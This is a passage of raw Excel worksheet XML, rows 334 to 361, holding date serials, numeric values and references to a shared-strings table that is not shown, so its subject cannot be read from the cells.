      <c r="W334" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="335" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A335" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B335" s="52">
        <v>43566.650861203707</v>
      </c>
      <c r="C335" s="95" t="s">
        <v>1240</v>
      </c>
      <c r="D335" s="96">
        <v>110</v>
      </c>
      <c r="E335" s="95" t="s">
        <v>1241</v>
      </c>
      <c r="F335" s="42">
        <v>110</v>
      </c>
      <c r="G335" s="95" t="s">
        <v>1242</v>
      </c>
      <c r="H335" t="s">
        <v>1243</v>
      </c>
      <c r="I335" t="s">
        <v>611</v>
      </c>
      <c r="J335" s="95" t="s">
        <v>612</v>
      </c>
      <c r="K335" s="95" t="s">
        <v>14</v>
      </c>
      <c r="L335" t="s">
        <v>77</v>
      </c>
      <c r="M335" s="95" t="s">
        <v>612</v>
      </c>
      <c r="N335" t="s">
        <v>613</v>
      </c>
      <c r="O335" s="95" t="s">
        <v>1244</v>
      </c>
      <c r="Q335" s="95" t="s">
        <v>1245</v>
      </c>
      <c r="R335">
        <v>56452</v>
      </c>
      <c r="S335">
        <v>55858</v>
      </c>
      <c r="W335" t="s">
        <v>107</v>
      </c>
    </row>
    <row r="336" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A336" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B336" s="52">
        <v>44312.455104699075</v>
      </c>
      <c r="C336" s="95" t="s">
        <v>1246</v>
      </c>
      <c r="D336" s="96">
        <v>113</v>
      </c>
      <c r="E336" s="95" t="s">
        <v>1247</v>
      </c>
      <c r="F336" s="42">
        <v>113</v>
      </c>
      <c r="G336" s="95" t="s">
        <v>1248</v>
      </c>
      <c r="H336" t="s">
        <v>89</v>
      </c>
      <c r="I336" t="s">
        <v>75</v>
      </c>
      <c r="J336" s="95" t="s">
        <v>76</v>
      </c>
      <c r="K336" s="95" t="s">
        <v>15</v>
      </c>
      <c r="L336" t="s">
        <v>77</v>
      </c>
      <c r="M336" s="95" t="s">
        <v>90</v>
      </c>
      <c r="N336" t="s">
        <v>91</v>
      </c>
      <c r="Q336" s="95" t="s">
        <v>1249</v>
      </c>
      <c r="R336">
        <v>93076</v>
      </c>
      <c r="S336">
        <v>154858</v>
      </c>
      <c r="T336">
        <v>42180102</v>
      </c>
      <c r="U336">
        <v>41278649</v>
      </c>
      <c r="V336">
        <v>50537375</v>
      </c>
      <c r="W336" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="337" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A337" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B337" s="52">
        <v>44312.455104687499</v>
      </c>
      <c r="C337" s="95" t="s">
        <v>1246</v>
      </c>
      <c r="D337" s="96">
        <v>113</v>
      </c>
      <c r="E337" s="95" t="s">
        <v>1250</v>
      </c>
      <c r="F337" s="42">
        <v>113</v>
      </c>
      <c r="G337" s="95" t="s">
        <v>1251</v>
      </c>
      <c r="H337" t="s">
        <v>110</v>
      </c>
      <c r="I337" t="s">
        <v>75</v>
      </c>
      <c r="J337" s="95" t="s">
        <v>76</v>
      </c>
      <c r="K337" s="95" t="s">
        <v>15</v>
      </c>
      <c r="L337" t="s">
        <v>77</v>
      </c>
      <c r="M337" s="95" t="s">
        <v>90</v>
      </c>
      <c r="N337" t="s">
        <v>91</v>
      </c>
      <c r="Q337" s="95" t="s">
        <v>1249</v>
      </c>
      <c r="R337">
        <v>2692855</v>
      </c>
      <c r="S337">
        <v>2555186</v>
      </c>
      <c r="T337">
        <v>2555180</v>
      </c>
      <c r="U337">
        <v>2680531</v>
      </c>
      <c r="V337">
        <v>3143115</v>
      </c>
      <c r="W337" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="338" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A338" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B338" s="52">
        <v>44504.458599166668</v>
      </c>
      <c r="C338" s="95" t="s">
        <v>1252</v>
      </c>
      <c r="D338" s="96">
        <v>110</v>
      </c>
      <c r="E338" s="95" t="s">
        <v>1253</v>
      </c>
      <c r="F338" s="42">
        <v>110</v>
      </c>
      <c r="G338" s="95" t="s">
        <v>1254</v>
      </c>
      <c r="H338" t="s">
        <v>1255</v>
      </c>
      <c r="I338" t="s">
        <v>172</v>
      </c>
      <c r="J338" s="95" t="s">
        <v>173</v>
      </c>
      <c r="K338" s="95" t="s">
        <v>13</v>
      </c>
      <c r="L338" t="s">
        <v>77</v>
      </c>
      <c r="M338" s="95" t="s">
        <v>1256</v>
      </c>
      <c r="N338" t="s">
        <v>1257</v>
      </c>
      <c r="Q338" s="95" t="s">
        <v>1258</v>
      </c>
      <c r="W338" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="339" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A339" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B339" s="52">
        <v>44434.635436087963</v>
      </c>
      <c r="C339" s="95" t="s">
        <v>1259</v>
      </c>
      <c r="D339" s="96">
        <v>100</v>
      </c>
      <c r="E339" s="95" t="s">
        <v>1260</v>
      </c>
      <c r="F339" s="42">
        <v>100</v>
      </c>
      <c r="G339" s="95" t="s">
        <v>1261</v>
      </c>
      <c r="H339" t="s">
        <v>1262</v>
      </c>
      <c r="I339" t="s">
        <v>172</v>
      </c>
      <c r="J339" s="95" t="s">
        <v>173</v>
      </c>
      <c r="K339" s="95" t="s">
        <v>13</v>
      </c>
      <c r="L339" t="s">
        <v>77</v>
      </c>
      <c r="M339" s="95" t="s">
        <v>1256</v>
      </c>
      <c r="N339" t="s">
        <v>1257</v>
      </c>
      <c r="Q339" s="95" t="s">
        <v>1258</v>
      </c>
      <c r="W339" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="340" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A340" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B340" s="52">
        <v>44474.396612256947</v>
      </c>
      <c r="C340" s="95" t="s">
        <v>1263</v>
      </c>
      <c r="D340" s="96">
        <v>101</v>
      </c>
      <c r="E340" s="95" t="s">
        <v>1264</v>
      </c>
      <c r="F340" s="42">
        <v>101</v>
      </c>
      <c r="G340" s="95" t="s">
        <v>1265</v>
      </c>
      <c r="H340" t="s">
        <v>1266</v>
      </c>
      <c r="I340" t="s">
        <v>172</v>
      </c>
      <c r="J340" s="95" t="s">
        <v>173</v>
      </c>
      <c r="K340" s="95" t="s">
        <v>13</v>
      </c>
      <c r="L340" t="s">
        <v>77</v>
      </c>
      <c r="M340" s="95" t="s">
        <v>1256</v>
      </c>
      <c r="N340" t="s">
        <v>1257</v>
      </c>
      <c r="Q340" s="95" t="s">
        <v>1258</v>
      </c>
      <c r="W340" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="341" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A341" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B341" s="52">
        <v>44434.619034537034</v>
      </c>
      <c r="C341" s="95" t="s">
        <v>1267</v>
      </c>
      <c r="D341" s="96">
        <v>100</v>
      </c>
      <c r="E341" s="95" t="s">
        <v>1268</v>
      </c>
      <c r="F341" s="42">
        <v>100</v>
      </c>
      <c r="G341" s="95" t="s">
        <v>1269</v>
      </c>
      <c r="H341" t="s">
        <v>1270</v>
      </c>
      <c r="I341" t="s">
        <v>172</v>
      </c>
      <c r="J341" s="95" t="s">
        <v>173</v>
      </c>
      <c r="K341" s="95" t="s">
        <v>13</v>
      </c>
      <c r="L341" t="s">
        <v>77</v>
      </c>
      <c r="M341" s="95" t="s">
        <v>1256</v>
      </c>
      <c r="N341" t="s">
        <v>1257</v>
      </c>
      <c r="Q341" s="95" t="s">
        <v>1258</v>
      </c>
      <c r="W341" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="342" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A342" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B342" s="52">
        <v>44445.61456603009</v>
      </c>
      <c r="C342" s="95" t="s">
        <v>1263</v>
      </c>
      <c r="D342" s="96">
        <v>101</v>
      </c>
      <c r="E342" s="95" t="s">
        <v>1271</v>
      </c>
      <c r="F342" s="42">
        <v>100</v>
      </c>
      <c r="G342" s="95" t="s">
        <v>1272</v>
      </c>
      <c r="H342" t="s">
        <v>1273</v>
      </c>
      <c r="I342" t="s">
        <v>172</v>
      </c>
      <c r="J342" s="95" t="s">
        <v>173</v>
      </c>
      <c r="K342" s="95" t="s">
        <v>13</v>
      </c>
      <c r="L342" t="s">
        <v>77</v>
      </c>
      <c r="M342" s="95" t="s">
        <v>1256</v>
      </c>
      <c r="N342" t="s">
        <v>1257</v>
      </c>
      <c r="Q342" s="95" t="s">
        <v>1258</v>
      </c>
      <c r="W342" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="343" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A343" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B343" s="52">
        <v>44434.635436111108</v>
      </c>
      <c r="C343" s="95" t="s">
        <v>1259</v>
      </c>
      <c r="D343" s="96">
        <v>100</v>
      </c>
      <c r="E343" s="95" t="s">
        <v>1274</v>
      </c>
      <c r="F343" s="42">
        <v>100</v>
      </c>
      <c r="G343" s="95" t="s">
        <v>1275</v>
      </c>
      <c r="H343" t="s">
        <v>1276</v>
      </c>
      <c r="I343" t="s">
        <v>172</v>
      </c>
      <c r="J343" s="95" t="s">
        <v>173</v>
      </c>
      <c r="K343" s="95" t="s">
        <v>13</v>
      </c>
      <c r="L343" t="s">
        <v>77</v>
      </c>
      <c r="M343" s="95" t="s">
        <v>1256</v>
      </c>
      <c r="N343" t="s">
        <v>1257</v>
      </c>
      <c r="Q343" s="95" t="s">
        <v>1258</v>
      </c>
      <c r="W343" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="344" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A344" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B344" s="52">
        <v>44504.458599155092</v>
      </c>
      <c r="C344" s="95" t="s">
        <v>1252</v>
      </c>
      <c r="D344" s="96">
        <v>110</v>
      </c>
      <c r="E344" s="95" t="s">
        <v>1277</v>
      </c>
      <c r="F344" s="42">
        <v>110</v>
      </c>
      <c r="G344" s="95" t="s">
        <v>1278</v>
      </c>
      <c r="H344" t="s">
        <v>1279</v>
      </c>
      <c r="I344" t="s">
        <v>172</v>
      </c>
      <c r="J344" s="95" t="s">
        <v>173</v>
      </c>
      <c r="K344" s="95" t="s">
        <v>13</v>
      </c>
      <c r="L344" t="s">
        <v>77</v>
      </c>
      <c r="M344" s="95" t="s">
        <v>1256</v>
      </c>
      <c r="N344" t="s">
        <v>1257</v>
      </c>
      <c r="Q344" s="95" t="s">
        <v>1258</v>
      </c>
      <c r="T344">
        <v>1</v>
      </c>
      <c r="W344" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="345" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A345" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B345" s="52">
        <v>44504.458599178244</v>
      </c>
      <c r="C345" s="95" t="s">
        <v>1252</v>
      </c>
      <c r="D345" s="96">
        <v>110</v>
      </c>
      <c r="E345" s="95" t="s">
        <v>1280</v>
      </c>
      <c r="F345" s="42">
        <v>110</v>
      </c>
      <c r="G345" s="95" t="s">
        <v>1281</v>
      </c>
      <c r="H345" t="s">
        <v>1282</v>
      </c>
      <c r="I345" t="s">
        <v>172</v>
      </c>
      <c r="J345" s="95" t="s">
        <v>173</v>
      </c>
      <c r="K345" s="95" t="s">
        <v>13</v>
      </c>
      <c r="L345" t="s">
        <v>77</v>
      </c>
      <c r="M345" s="95" t="s">
        <v>1256</v>
      </c>
      <c r="N345" t="s">
        <v>1257</v>
      </c>
      <c r="Q345" s="95" t="s">
        <v>1258</v>
      </c>
      <c r="W345" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="346" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A346" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B346" s="52">
        <v>44434.61903454861</v>
      </c>
      <c r="C346" s="95" t="s">
        <v>1267</v>
      </c>
      <c r="D346" s="96">
        <v>100</v>
      </c>
      <c r="E346" s="95" t="s">
        <v>1283</v>
      </c>
      <c r="F346" s="42">
        <v>100</v>
      </c>
      <c r="G346" s="95" t="s">
        <v>1284</v>
      </c>
      <c r="H346" t="s">
        <v>1285</v>
      </c>
      <c r="I346" t="s">
        <v>172</v>
      </c>
      <c r="J346" s="95" t="s">
        <v>173</v>
      </c>
      <c r="K346" s="95" t="s">
        <v>13</v>
      </c>
      <c r="L346" t="s">
        <v>77</v>
      </c>
      <c r="M346" s="95" t="s">
        <v>1256</v>
      </c>
      <c r="N346" t="s">
        <v>1257</v>
      </c>
      <c r="Q346" s="95" t="s">
        <v>1258</v>
      </c>
      <c r="W346" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="347" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A347" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B347" s="52">
        <v>44016.919070185184</v>
      </c>
      <c r="C347" s="95" t="s">
        <v>1286</v>
      </c>
      <c r="D347" s="96">
        <v>104</v>
      </c>
      <c r="E347" s="95" t="s">
        <v>1287</v>
      </c>
      <c r="F347" s="42">
        <v>102</v>
      </c>
      <c r="G347" s="95" t="s">
        <v>1288</v>
      </c>
      <c r="H347" t="s">
        <v>1289</v>
      </c>
      <c r="I347" t="s">
        <v>268</v>
      </c>
      <c r="J347" s="95" t="s">
        <v>269</v>
      </c>
      <c r="K347" s="95" t="s">
        <v>10</v>
      </c>
      <c r="L347" t="s">
        <v>77</v>
      </c>
      <c r="M347" s="95" t="s">
        <v>270</v>
      </c>
      <c r="N347" t="s">
        <v>271</v>
      </c>
      <c r="O347" s="95" t="s">
        <v>1290</v>
      </c>
      <c r="P347" t="s">
        <v>272</v>
      </c>
      <c r="Q347" s="95" t="s">
        <v>1291</v>
      </c>
      <c r="R347">
        <v>94742</v>
      </c>
      <c r="S347">
        <v>103735</v>
      </c>
      <c r="T347">
        <v>96125</v>
      </c>
      <c r="U347">
        <v>105138</v>
      </c>
      <c r="V347">
        <v>120505</v>
      </c>
      <c r="W347" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="348" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A348" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B348" s="52">
        <v>44081.616353287034</v>
      </c>
      <c r="C348" s="95" t="s">
        <v>1286</v>
      </c>
      <c r="D348" s="96">
        <v>101</v>
      </c>
      <c r="E348" s="95" t="s">
        <v>1287</v>
      </c>
      <c r="F348" s="42">
        <v>101</v>
      </c>
      <c r="G348" s="95" t="s">
        <v>1288</v>
      </c>
      <c r="H348" t="s">
        <v>1289</v>
      </c>
      <c r="I348" t="s">
        <v>268</v>
      </c>
      <c r="J348" s="95" t="s">
        <v>269</v>
      </c>
      <c r="K348" s="95" t="s">
        <v>10</v>
      </c>
      <c r="L348" t="s">
        <v>77</v>
      </c>
      <c r="M348" s="95" t="s">
        <v>270</v>
      </c>
      <c r="N348" t="s">
        <v>271</v>
      </c>
      <c r="Q348" s="95" t="s">
        <v>1292</v>
      </c>
      <c r="R348">
        <v>94742</v>
      </c>
      <c r="S348">
        <v>103735</v>
      </c>
      <c r="T348">
        <v>96125</v>
      </c>
      <c r="U348">
        <v>105138</v>
      </c>
      <c r="V348">
        <v>120505</v>
      </c>
      <c r="W348" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="349" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A349" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B349" s="52">
        <v>44252.698165682872</v>
      </c>
      <c r="C349" s="95" t="s">
        <v>1286</v>
      </c>
      <c r="D349" s="96">
        <v>200</v>
      </c>
      <c r="E349" s="95" t="s">
        <v>1293</v>
      </c>
      <c r="F349" s="42">
        <v>200</v>
      </c>
      <c r="G349" s="95" t="s">
        <v>1288</v>
      </c>
      <c r="H349" t="s">
        <v>1289</v>
      </c>
      <c r="I349" t="s">
        <v>268</v>
      </c>
      <c r="J349" s="95" t="s">
        <v>269</v>
      </c>
      <c r="K349" s="95" t="s">
        <v>10</v>
      </c>
      <c r="L349" t="s">
        <v>77</v>
      </c>
      <c r="M349" s="95" t="s">
        <v>270</v>
      </c>
      <c r="N349" t="s">
        <v>271</v>
      </c>
      <c r="Q349" s="95" t="s">
        <v>1294</v>
      </c>
      <c r="R349">
        <v>94742</v>
      </c>
      <c r="S349">
        <v>103735</v>
      </c>
      <c r="T349">
        <v>96125</v>
      </c>
      <c r="U349">
        <v>105138</v>
      </c>
      <c r="V349">
        <v>120505</v>
      </c>
      <c r="W349" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="350" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A350" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B350" s="52">
        <v>44037.962066990738</v>
      </c>
      <c r="C350" s="95" t="s">
        <v>1286</v>
      </c>
      <c r="D350" s="96">
        <v>100</v>
      </c>
      <c r="E350" s="95" t="s">
        <v>1287</v>
      </c>
      <c r="F350" s="42">
        <v>100</v>
      </c>
      <c r="G350" s="95" t="s">
        <v>1288</v>
      </c>
      <c r="H350" t="s">
        <v>1289</v>
      </c>
      <c r="I350" t="s">
        <v>268</v>
      </c>
      <c r="J350" s="95" t="s">
        <v>269</v>
      </c>
      <c r="K350" s="95" t="s">
        <v>10</v>
      </c>
      <c r="L350" t="s">
        <v>77</v>
      </c>
      <c r="M350" s="95" t="s">
        <v>270</v>
      </c>
      <c r="N350" t="s">
        <v>271</v>
      </c>
      <c r="O350" s="95" t="s">
        <v>1295</v>
      </c>
      <c r="Q350" s="95" t="s">
        <v>161</v>
      </c>
      <c r="R350">
        <v>94742</v>
      </c>
      <c r="S350">
        <v>103735</v>
      </c>
      <c r="T350">
        <v>96125</v>
      </c>
      <c r="U350">
        <v>105138</v>
      </c>
      <c r="V350">
        <v>120505</v>
      </c>
      <c r="W350" t="s">
        <v>293</v>
      </c>
    </row>
    <row r="351" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A351" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B351" s="52">
        <v>44169.134548020833</v>
      </c>
      <c r="C351" s="95" t="s">
        <v>1286</v>
      </c>
      <c r="D351" s="96">
        <v>104</v>
      </c>
      <c r="E351" s="95" t="s">
        <v>1296</v>
      </c>
      <c r="F351" s="42">
        <v>100</v>
      </c>
      <c r="G351" s="95" t="s">
        <v>1297</v>
      </c>
      <c r="H351" t="s">
        <v>1298</v>
      </c>
      <c r="I351" t="s">
        <v>268</v>
      </c>
      <c r="J351" s="95" t="s">
        <v>269</v>
      </c>
      <c r="K351" s="95" t="s">
        <v>10</v>
      </c>
      <c r="L351" t="s">
        <v>77</v>
      </c>
      <c r="M351" s="95" t="s">
        <v>270</v>
      </c>
      <c r="N351" t="s">
        <v>271</v>
      </c>
      <c r="Q351" s="95" t="s">
        <v>1291</v>
      </c>
      <c r="R351">
        <v>19</v>
      </c>
      <c r="S351">
        <v>2</v>
      </c>
      <c r="T351">
        <v>3</v>
      </c>
      <c r="U351">
        <v>1973</v>
      </c>
      <c r="V351">
        <v>20228</v>
      </c>
      <c r="W351" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="352" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A352" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B352" s="52">
        <v>44252.698165706017</v>
      </c>
      <c r="C352" s="95" t="s">
        <v>1286</v>
      </c>
      <c r="D352" s="96">
        <v>200</v>
      </c>
      <c r="E352" s="95" t="s">
        <v>1296</v>
      </c>
      <c r="F352" s="42">
        <v>101</v>
      </c>
      <c r="G352" s="95" t="s">
        <v>1297</v>
      </c>
      <c r="H352" t="s">
        <v>1298</v>
      </c>
      <c r="I352" t="s">
        <v>268</v>
      </c>
      <c r="J352" s="95" t="s">
        <v>269</v>
      </c>
      <c r="K352" s="95" t="s">
        <v>10</v>
      </c>
      <c r="L352" t="s">
        <v>77</v>
      </c>
      <c r="M352" s="95" t="s">
        <v>270</v>
      </c>
      <c r="N352" t="s">
        <v>271</v>
      </c>
      <c r="O352" s="95" t="s">
        <v>111</v>
      </c>
      <c r="Q352" s="95" t="s">
        <v>1294</v>
      </c>
      <c r="R352">
        <v>19</v>
      </c>
      <c r="S352">
        <v>2</v>
      </c>
      <c r="T352">
        <v>3</v>
      </c>
      <c r="U352">
        <v>1973</v>
      </c>
      <c r="V352">
        <v>20228</v>
      </c>
      <c r="W352" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="353" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A353" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B353" s="52">
        <v>44057.72132099537</v>
      </c>
      <c r="C353" s="95" t="s">
        <v>1286</v>
      </c>
      <c r="D353" s="96">
        <v>104</v>
      </c>
      <c r="E353" s="95" t="s">
        <v>1299</v>
      </c>
      <c r="F353" s="42">
        <v>100</v>
      </c>
      <c r="G353" s="95" t="s">
        <v>1300</v>
      </c>
      <c r="H353" t="s">
        <v>1301</v>
      </c>
      <c r="I353" t="s">
        <v>268</v>
      </c>
      <c r="J353" s="95" t="s">
        <v>269</v>
      </c>
      <c r="K353" s="95" t="s">
        <v>10</v>
      </c>
      <c r="L353" t="s">
        <v>77</v>
      </c>
      <c r="M353" s="95" t="s">
        <v>270</v>
      </c>
      <c r="N353" t="s">
        <v>271</v>
      </c>
      <c r="Q353" s="95" t="s">
        <v>1291</v>
      </c>
      <c r="W353" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="354" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A354" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B354" s="52">
        <v>44252.698165694441</v>
      </c>
      <c r="C354" s="95" t="s">
        <v>1286</v>
      </c>
      <c r="D354" s="96">
        <v>200</v>
      </c>
      <c r="E354" s="95" t="s">
        <v>1302</v>
      </c>
      <c r="F354" s="42">
        <v>200</v>
      </c>
      <c r="G354" s="95" t="s">
        <v>1303</v>
      </c>
      <c r="H354" t="s">
        <v>1301</v>
      </c>
      <c r="I354" t="s">
        <v>268</v>
      </c>
      <c r="J354" s="95" t="s">
        <v>269</v>
      </c>
      <c r="K354" s="95" t="s">
        <v>10</v>
      </c>
      <c r="L354" t="s">
        <v>77</v>
      </c>
      <c r="M354" s="95" t="s">
        <v>270</v>
      </c>
      <c r="N354" t="s">
        <v>271</v>
      </c>
      <c r="Q354" s="95" t="s">
        <v>1294</v>
      </c>
      <c r="W354" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="355" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A355" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B355" s="52">
        <v>44087.123192928244</v>
      </c>
      <c r="C355" s="95" t="s">
        <v>1304</v>
      </c>
      <c r="D355" s="96">
        <v>101</v>
      </c>
      <c r="E355" s="95" t="s">
        <v>1305</v>
      </c>
      <c r="F355" s="42">
        <v>100</v>
      </c>
      <c r="G355" s="95" t="s">
        <v>1306</v>
      </c>
      <c r="H355" t="s">
        <v>1307</v>
      </c>
      <c r="I355" t="s">
        <v>268</v>
      </c>
      <c r="J355" s="95" t="s">
        <v>566</v>
      </c>
      <c r="K355" s="95" t="s">
        <v>12</v>
      </c>
      <c r="L355" t="s">
        <v>77</v>
      </c>
      <c r="M355" s="95" t="s">
        <v>622</v>
      </c>
      <c r="N355" t="s">
        <v>623</v>
      </c>
      <c r="Q355" s="95" t="s">
        <v>1308</v>
      </c>
      <c r="U355">
        <v>8</v>
      </c>
      <c r="W355" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="356" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A356" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B356" s="52">
        <v>44489.668331828703</v>
      </c>
      <c r="C356" s="95" t="s">
        <v>1304</v>
      </c>
      <c r="D356" s="96">
        <v>204</v>
      </c>
      <c r="E356" s="95" t="s">
        <v>1305</v>
      </c>
      <c r="F356" s="42">
        <v>203</v>
      </c>
      <c r="G356" s="95" t="s">
        <v>1306</v>
      </c>
      <c r="H356" t="s">
        <v>1309</v>
      </c>
      <c r="I356" t="s">
        <v>268</v>
      </c>
      <c r="J356" s="95" t="s">
        <v>566</v>
      </c>
      <c r="K356" s="95" t="s">
        <v>12</v>
      </c>
      <c r="L356" t="s">
        <v>77</v>
      </c>
      <c r="M356" s="95" t="s">
        <v>622</v>
      </c>
      <c r="N356" t="s">
        <v>623</v>
      </c>
      <c r="Q356" s="95" t="s">
        <v>1310</v>
      </c>
      <c r="U356">
        <v>8</v>
      </c>
      <c r="W356" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="357" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A357" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B357" s="52">
        <v>44489.668331886576</v>
      </c>
      <c r="C357" s="95" t="s">
        <v>1304</v>
      </c>
      <c r="D357" s="96">
        <v>204</v>
      </c>
      <c r="E357" s="95" t="s">
        <v>1311</v>
      </c>
      <c r="F357" s="42">
        <v>101</v>
      </c>
      <c r="G357" s="95" t="s">
        <v>1312</v>
      </c>
      <c r="H357" t="s">
        <v>1313</v>
      </c>
      <c r="I357" t="s">
        <v>268</v>
      </c>
      <c r="J357" s="95" t="s">
        <v>566</v>
      </c>
      <c r="K357" s="95" t="s">
        <v>12</v>
      </c>
      <c r="L357" t="s">
        <v>77</v>
      </c>
      <c r="M357" s="95" t="s">
        <v>622</v>
      </c>
      <c r="N357" t="s">
        <v>623</v>
      </c>
      <c r="O357" s="95" t="s">
        <v>111</v>
      </c>
      <c r="Q357" s="95" t="s">
        <v>1310</v>
      </c>
      <c r="R357">
        <v>735</v>
      </c>
      <c r="S357">
        <v>889</v>
      </c>
      <c r="T357">
        <v>1025</v>
      </c>
      <c r="U357">
        <v>1096</v>
      </c>
      <c r="V357">
        <v>1003</v>
      </c>
      <c r="W357" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="358" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A358" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B358" s="52">
        <v>44522.394452928238</v>
      </c>
      <c r="C358" s="95" t="s">
        <v>1304</v>
      </c>
      <c r="D358" s="96">
        <v>204</v>
      </c>
      <c r="E358" s="95" t="s">
        <v>1314</v>
      </c>
      <c r="F358" s="42">
        <v>102</v>
      </c>
      <c r="G358" s="95" t="s">
        <v>1315</v>
      </c>
      <c r="H358" t="s">
        <v>1316</v>
      </c>
      <c r="I358" t="s">
        <v>268</v>
      </c>
      <c r="J358" s="95" t="s">
        <v>566</v>
      </c>
      <c r="K358" s="95" t="s">
        <v>12</v>
      </c>
      <c r="L358" t="s">
        <v>77</v>
      </c>
      <c r="M358" s="95" t="s">
        <v>622</v>
      </c>
      <c r="N358" t="s">
        <v>623</v>
      </c>
      <c r="Q358" s="95" t="s">
        <v>1310</v>
      </c>
      <c r="W358" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="359" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A359" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B359" s="52">
        <v>44128.941194305553</v>
      </c>
      <c r="C359" s="95" t="s">
        <v>1304</v>
      </c>
      <c r="D359" s="96">
        <v>101</v>
      </c>
      <c r="E359" s="95" t="s">
        <v>1317</v>
      </c>
      <c r="F359" s="42">
        <v>101</v>
      </c>
      <c r="G359" s="95" t="s">
        <v>1318</v>
      </c>
      <c r="H359" t="s">
        <v>1319</v>
      </c>
      <c r="I359" t="s">
        <v>268</v>
      </c>
      <c r="J359" s="95" t="s">
        <v>566</v>
      </c>
      <c r="K359" s="95" t="s">
        <v>40</v>
      </c>
      <c r="L359" t="s">
        <v>83</v>
      </c>
      <c r="N359" t="s">
        <v>1320</v>
      </c>
      <c r="Q359" s="95" t="s">
        <v>1308</v>
      </c>
      <c r="R359">
        <v>495</v>
      </c>
      <c r="S359">
        <v>68</v>
      </c>
      <c r="T359">
        <v>89</v>
      </c>
      <c r="U359">
        <v>1482</v>
      </c>
      <c r="V359">
        <v>1423</v>
      </c>
      <c r="W359" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="360" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A360" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B360" s="52">
        <v>44489.668331851855</v>
      </c>
      <c r="C360" s="95" t="s">
        <v>1304</v>
      </c>
      <c r="D360" s="96">
        <v>204</v>
      </c>
      <c r="E360" s="95" t="s">
        <v>1317</v>
      </c>
      <c r="F360" s="42">
        <v>201</v>
      </c>
      <c r="G360" s="95" t="s">
        <v>1318</v>
      </c>
      <c r="H360" t="s">
        <v>1319</v>
      </c>
      <c r="I360" t="s">
        <v>268</v>
      </c>
      <c r="J360" s="95" t="s">
        <v>566</v>
      </c>
      <c r="K360" s="95" t="s">
        <v>40</v>
      </c>
      <c r="L360" t="s">
        <v>83</v>
      </c>
      <c r="N360" t="s">
        <v>1320</v>
      </c>
      <c r="O360" s="95" t="s">
        <v>111</v>
      </c>
      <c r="Q360" s="95" t="s">
        <v>1310</v>
      </c>
      <c r="R360">
        <v>495</v>
      </c>
      <c r="S360">
        <v>68</v>
      </c>
      <c r="T360">
        <v>89</v>
      </c>
      <c r="U360">
        <v>1482</v>
      </c>
      <c r="V360">
        <v>1423</v>
      </c>
      <c r="W360" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="361" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A361" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B361" s="52">
